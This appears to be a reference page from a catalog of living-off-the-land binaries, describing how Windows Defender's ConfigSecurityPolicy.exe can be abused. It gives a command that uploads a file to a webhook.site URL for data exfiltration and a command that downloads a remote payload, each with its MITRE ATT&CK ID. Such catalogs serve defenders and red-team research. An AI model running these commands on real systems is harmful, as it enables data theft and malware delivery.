.. /ConfigSecurityPolicy.exe
Star

Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.


Paths:

Resources:
Acknowledgements:

Detection:

Upload

Upload file, credentials or data exfiltration in general
ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Usecase: Upload file
Privileges required: User
OS: Windows 10
MITRE ATT&CK®: T1567



Download

It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
ConfigSecurityPolicy.exe https://example.com/payload
Usecase: Downloads payload from remote server
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105